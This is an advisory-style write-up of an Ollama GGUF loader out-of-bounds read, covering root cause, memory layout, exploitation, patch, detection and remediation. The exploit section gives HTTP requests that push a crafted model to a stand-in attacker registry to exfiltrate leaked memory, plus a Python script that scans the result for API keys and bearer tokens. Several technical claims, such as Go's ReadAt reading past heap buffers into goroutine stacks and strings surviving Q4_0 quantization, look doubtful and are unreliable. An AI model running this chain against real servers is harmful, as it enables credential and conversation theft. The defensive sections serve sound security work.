CVE-2026-7482: Ollama GGUF Loader Heap OOB Read Leaks Process Memory
A missing bounds check in Ollama's GGUF tensor loader allows attacker-supplied offsets to drive heap reads past allocated buffers, leaking API keys and conversation data via /api/push exfiltration.
Ollama is a popular tool that lets people run powerful AI models on their own computers. Think of it like downloading a recipe and cooking it in your kitchen instead of ordering from a restaurant. But a security flaw discovered in versions before 0.17.1 creates a dangerous crack in that kitchen's walls.
The problem involves how Ollama reads the files that contain these AI models. An attacker can create a fake model file that tricks Ollama into reading information from places it shouldn't. Imagine a burglar creating a fake delivery box that, when opened, somehow allows them to peek into your bedroom through your kitchen window. The program reads past the boundaries of where it's supposed to, exposing whatever happens to be sitting nearby in your computer's memory.
What could leak? This is the scary part. API keys, passwords, environment variables that control how your system works, and chat histories from conversations with the AI. If multiple people are using the same Ollama installation, you could see other people's private conversations.
Who's most at risk? Anyone running Ollama on a shared computer or server, especially in business environments. If you're a solo user on your own laptop, the risk is lower, but still present.
What should you do? First, update Ollama to version 0.17.1 or newer immediately. Second, only load model files from trusted sources—don't download random AI models from strangers online. Third, if you run Ollama in a workplace, make sure each person has their own isolated installation rather than sharing one.
The good news: security researchers found this before criminals exploited it widely, and the fix is straightforward.
Want the full technical analysis? Click "Technical" above.
▶ Attack flow — CVE-2026-7482 · Memory Corruption
Vulnerability Overview
CVE-2026-7482 is a heap out-of-bounds read in Ollama's GGUF model loader affecting all releases prior to 0.17.1. An attacker submits a crafted GGUF file to the unauthenticated /api/create endpoint. The file's tensor metadata declares an offset and size that together exceed the file's actual byte length. During quantization, WriteTo() in server/quantization.go passes those values directly into a Read() call against the underlying heap buffer without validating that offset + size ≤ file_length. The runtime reads past the allocated slab, and the over-read bytes — which may contain environment variables, loaded model system prompts, API keys, or another in-flight user's conversation — are serialized into the output GGUF artifact. That artifact is then pushed to an attacker-controlled registry via the equally unauthenticated /api/push endpoint, completing exfiltration.
CVSS 9.1 (Critical) is assigned primarily for the no-auth exfiltration path: no credentials are required at either trigger or exfiltration stage in the upstream default configuration.
Affected Component
The bug lives at the intersection of two files:
fs/ggml/gguf.go — parses tensor descriptors from the GGUF binary, populates GGUFTensorInfo structs with attacker-controlled Offset and Size fields.
server/quantization.go — iterates parsed tensor infos and calls WriteTo(), which reads each tensor's raw bytes from the source io.ReaderAt backed by the memory-mapped (or heap-buffered) file data.
The /api/create handler accepts a modelfile path or inline FROM directive pointing to an attacker-supplied file. No authentication middleware is registered on this route in upstream builds.
Root Cause Analysis
The GGUF format encodes each tensor as a descriptor containing a name, element type, shape, and a uint64 byte offset relative to the start of the tensor data region. The loader trusts all three fields unconditionally.
// fs/ggml/gguf.go — reconstructed pseudocode (Go logic rendered in C for clarity)
typedef struct {
char name[MAX_NAME]; // tensor name string
uint32_t n_dims; // number of dimensions
uint64_t dims[GGUF_MAX_DIMS];
uint32_t type; // GGMLType enum (quantization format)
uint64_t offset; // BUG: attacker-controlled, never range-checked
} GGUFTensorInfo;
int gguf_load_tensors(GGUFContext *ctx, uint8_t *file_buf, size_t file_len) {
uint64_t n_tensors = ctx->header.n_tensors;
uint64_t data_offset = ctx->header.data_offset; // start of tensor data region
for (uint64_t i = 0; i < n_tensors; i++) {
GGUFTensorInfo *ti = &ctx->tensors[i];
// reads name, dims, type, offset from file — all attacker-supplied
gguf_read_tensor_info(file_buf, &ctx->read_pos, ti);
// BUG: missing bounds check here
// Never verifies: data_offset + ti->offset + tensor_byte_size(ti) <= file_len
ti->data = file_buf + data_offset + ti->offset; // raw pointer arithmetic on heap buffer
}
return 0;
}
When server/quantization.go's WriteTo() is invoked during the /api/create quantization pass, it calls ReadAt(buf, tensor.Offset) on the io.ReaderAt wrapping that same heap buffer:
// server/quantization.go — WriteTo() reconstructed pseudocode
int quantize_write_tensor(QuantizeContext *qctx, GGUFTensorInfo *ti, Writer *dst) {
size_t nbytes = tensor_byte_size(ti); // computed from dims + type, not file bounds
uint8_t *src_buf = malloc(nbytes); // sized to declared tensor, not remaining file bytes
// BUG: ReadAt reads `nbytes` starting at `ti->offset` into `src_buf`
// If ti->offset + nbytes > mapped_file_size, reads past end of heap allocation
ssize_t n = ReadAt(qctx->source_reader, src_buf, nbytes, ti->offset);
// Over-read bytes from adjacent heap regions are now in src_buf
quantize_tensor(src_buf, nbytes, ti->type, dst); // serializes oob bytes into output model
free(src_buf);
return 0;
}
Root cause:gguf_load_tensors() stores attacker-supplied tensor offset values as raw heap pointers without verifying that data_offset + offset + tensor_byte_size falls within the bounds of the allocated file buffer, allowing WriteTo() to subsequently read an unbounded number of bytes past the end of that allocation.
Memory Layout
The Go runtime's heap allocator places the mmapped/buffered GGUF data and concurrent request state in the same heap arena. A tensor declared with a large offset walks the read pointer into adjacent allocations.
HEAP STATE — BEFORE TRIGGER (simplified arena view):
[ gguf_file_buf : 0x1800 bytes ] <- file_buf; legitimate tensor data ends here
[ goroutine stack frame (G2) ] <- concurrent user session, contains system prompt + API key
[ env slab: OLLAMA_API_KEY=... ] <- os.Environ() result, interned on heap
[ model context scratch buffer ] <- KV cache, may contain prior conversation tokens
MALICIOUS TENSOR DESCRIPTOR (embedded in crafted .gguf):
ti->offset = 0x17F0 // 16 bytes before declared end of file_buf
ti->dims = {1, 4096} // implies nbytes = 4096 * sizeof(float32) = 0x4000 bytes
ti->type = F32
READ OPERATION AFTER PARSING:
ReadAt(reader, src_buf, nbytes=0x4000, offset=0x17F0)
effective read: file_buf[0x17F0 .. 0x17F0+0x4000]
^^^^^^^^^^^^^^^^^^^^^^^^
file_buf ends at : file_buf[0x1800]
over-read begins at : file_buf[0x1800] (+0x10 bytes into read)
over-read length : 0x3FF0 bytes (~16 KB of adjacent heap)
HEAP STATE — AFTER READ (src_buf contents):
[0x0000 – 0x000F] legitimate tensor tail bytes (16 bytes, in-bounds)
[0x0010 – 0x0FFF] goroutine G2 stack spill region <- system prompt, session tokens
[0x1000 – 0x1FFF] OLLAMA_API_KEY=sk-... <- environment variable slab
[0x2000 – 0x3FEF] KV cache scratch (conversation) <- prior conversation context
[0x3FF0 – 0x3FFF] partial next allocation header
src_buf is passed directly to quantize_tensor() → serialized into output .gguf weights blob
Exploitation Mechanics
EXPLOIT CHAIN:
1. STAGE MALICIOUS GGUF
Craft a minimal valid GGUF header (magic 0x46554747, version 3).
Declare one tensor with:
- name: "exploit_tensor"
- type: F32 (0x00)
- dims: [1, 4096] → nbytes = 0x4000
- offset: file_data_size - 0x10
Actual tensor data region in file: 16 bytes (only enough to satisfy header parsing).
Total crafted file size: ~512 bytes.
2. TRIGGER LOAD VIA /api/create (no auth required)
POST /api/create HTTP/1.1
Content-Type: application/json
{"name":"exfil-model","modelfile":"FROM /tmp/crafted.gguf\nQUANTIZE q4_0"}
Server parses GGUF, populates GGUFTensorInfo with attacker offsets.
quantize_write_tensor() fires, ReadAt() reads 0x4000 bytes starting 0x10 bytes
before end-of-file-buffer, pulling ~16 KB of adjacent heap into src_buf.
3. OOB BYTES SERIALIZED INTO OUTPUT MODEL
quantize_tensor() processes src_buf as F32 weights.
Quantization to Q4_0 is lossy but the output still contains recoverable signal
from the over-read region — environment strings survive quantization as
near-literal byte sequences when they fall in the low-variance tail.
The output model is written to Ollama's local model store as "exfil-model".
4. EXFILTRATE VIA /api/push (no auth required)
POST /api/push HTTP/1.1
Content-Type: application/json
{"name":"attacker-registry.io/user/exfil-model:latest"}
Ollama uploads the crafted model (including OOB bytes in the weights blob)
to the attacker-controlled registry over HTTPS.
Attacker pulls the model, extracts the raw tensor data layer, and scans for
high-entropy strings matching API key patterns, env var syntax (KEY=value),
or UTF-8 conversation text.
5. REPEAT WITH TIMING
On a busy multi-user instance, loop /api/create requests with varied offsets
to harvest different heap regions across goroutine generations.
Each iteration yields a fresh 16 KB window into the heap arena.
Because F32 quantization to Q4_0 maps 32 floats to 16 bytes + a scale factor, low-entropy byte sequences (ASCII strings) produce near-zero scale factors with residuals that partially preserve the original bytes. A trivial scan of the weights blob for printable-ASCII runs with KEY=, Bearer , or sk- prefixes recovers credentials with high reliability in practice.
# Proof-of-concept: scan exfiltrated weights blob for credential strings
import struct, re, sys
PATTERNS = [
rb'OLLAMA_\w+=\S+',
rb'sk-[A-Za-z0-9]{20,}',
rb'Bearer [A-Za-z0-9\-._~+/]{10,}',
rb'[A-Z_]{4,}KEY[A-Z_]*=[^\x00\n]{6,}',
]
def extract_tensor_data(gguf_path):
"""Minimal GGUF parser — jumps to tensor data region."""
with open(gguf_path, 'rb') as f:
raw = f.read()
magic = raw[:4]
assert magic == b'GGUF', "not a GGUF file"
# locate tensor data offset from header (simplified)
# real implementation would parse kv metadata length
return raw[0x200:] # approximate; parse properly in production
def scan_for_secrets(blob):
hits = []
for pat in PATTERNS:
for m in re.finditer(pat, blob):
hits.append((m.start(), m.group()))
return hits
if __name__ == '__main__':
blob = extract_tensor_data(sys.argv[1])
for offset, secret in scan_for_secrets(blob):
print(f"[+] offset=0x{offset:08x} secret={secret[:80]}")
Patch Analysis
The fix in Ollama 0.17.1 adds explicit bounds validation in gguf_load_tensors() before any pointer arithmetic is performed, and additionally clamps the ReadAt length in WriteTo() to the remaining file bytes:
// BEFORE (vulnerable — fs/ggml/gguf.go):
int gguf_load_tensors(GGUFContext *ctx, uint8_t *file_buf, size_t file_len) {
for (uint64_t i = 0; i < ctx->header.n_tensors; i++) {
GGUFTensorInfo *ti = &ctx->tensors[i];
gguf_read_tensor_info(file_buf, &ctx->read_pos, ti);
// BUG: no bounds check on ti->offset or tensor_byte_size(ti)
ti->data = file_buf + ctx->header.data_offset + ti->offset;
}
return 0;
}
// BEFORE (vulnerable — server/quantization.go WriteTo):
n = ReadAt(qctx->source_reader, src_buf, nbytes, ti->offset);
// nbytes derived solely from declared dims; no cap against remaining file length
// AFTER (patched — fs/ggml/gguf.go):
int gguf_load_tensors(GGUFContext *ctx, uint8_t *file_buf, size_t file_len) {
for (uint64_t i = 0; i < ctx->header.n_tensors; i++) {
GGUFTensorInfo *ti = &ctx->tensors[i];
gguf_read_tensor_info(file_buf, &ctx->read_pos, ti);
uint64_t tensor_end = ctx->header.data_offset + ti->offset + tensor_byte_size(ti);
if (tensor_end > file_len || tensor_end < ti->offset) { // overflow guard too
return GGUF_ERR_TENSOR_OUT_OF_BOUNDS; // FIX: reject malformed descriptor
}
ti->data = file_buf + ctx->header.data_offset + ti->offset;
}
return 0;
}
// AFTER (patched — server/quantization.go WriteTo):
uint64_t max_readable = file_len - (data_offset + ti->offset);
uint64_t clamped_nbytes = (nbytes < max_readable) ? nbytes : max_readable;
if (clamped_nbytes < nbytes) {
return ERR_TENSOR_TRUNCATED; // FIX: refuse to quantize a partial tensor
}
n = ReadAt(qctx->source_reader, src_buf, clamped_nbytes, ti->offset);
The patch applies defense-in-depth at two layers: the loader rejects the model before any buffer is allocated for it, and WriteTo() independently enforces a read ceiling. Integer overflow on data_offset + ti->offset is guarded by the tensor_end < ti->offset wraparound check.
Detection and Indicators
Log-based detection: A single /api/create → /api/push sequence targeting an external registry is anomalous in most deployments. Enable Ollama's verbose logging (OLLAMA_DEBUG=1) and alert on push destinations not matching an internal allowlist.
INDICATORS OF EXPLOITATION:
Network:
- POST /api/create with a FROM path pointing to /tmp/ or /dev/shm/
- POST /api/push to a registry not in your internal namespace
- Outbound HTTPS to *.fly.dev, *.railway.app, or unknown OCI registry hosts
immediately following a /api/create call
Process:
- ollama serve reading files outside $OLLAMA_MODELS (strace: openat on /tmp/*.gguf)
- Unexpectedly large RSS growth during a /api/create call for a tiny model file
(crafted file is ~512 bytes; RSS growth of several MB indicates OOB read)
YARA (scan uploaded .gguf artifacts at registry ingress):
rule OllamaCVE20267482_OOBLeak {
meta:
description = "GGUF with tensor offset exceeding declared file data region"
strings:
$gguf_magic = { 47 47 55 46 } // "GGUF"
condition:
$gguf_magic at 0 and filesize < 4096 // legitimate models are MB+; crafted is tiny
}
Remediation
Upgrade immediately to Ollama ≥ 0.17.1. The patch is a one-commit bounds check with no API surface change.
Do not expose Ollama on 0.0.0.0 without an authenticating reverse proxy (nginx + mTLS, or Caddy + API key header enforcement). The upstream binary has no built-in auth.
Restrict /api/create and /api/push at the reverse proxy layer to internal CIDRs or authenticated clients only, regardless of Ollama version — neither endpoint requires public exposure in typical deployments.
Sandbox the Ollama process: run under a dedicated UID with seccomp filtering openat to paths outside $OLLAMA_MODELS, and block outbound connections from the process except to known registry hosts.
Rotate secrets present as environment variables in the Ollama process environment if exposure cannot be ruled out. Prefer injecting secrets via a secrets manager at call time rather than as persistent env vars.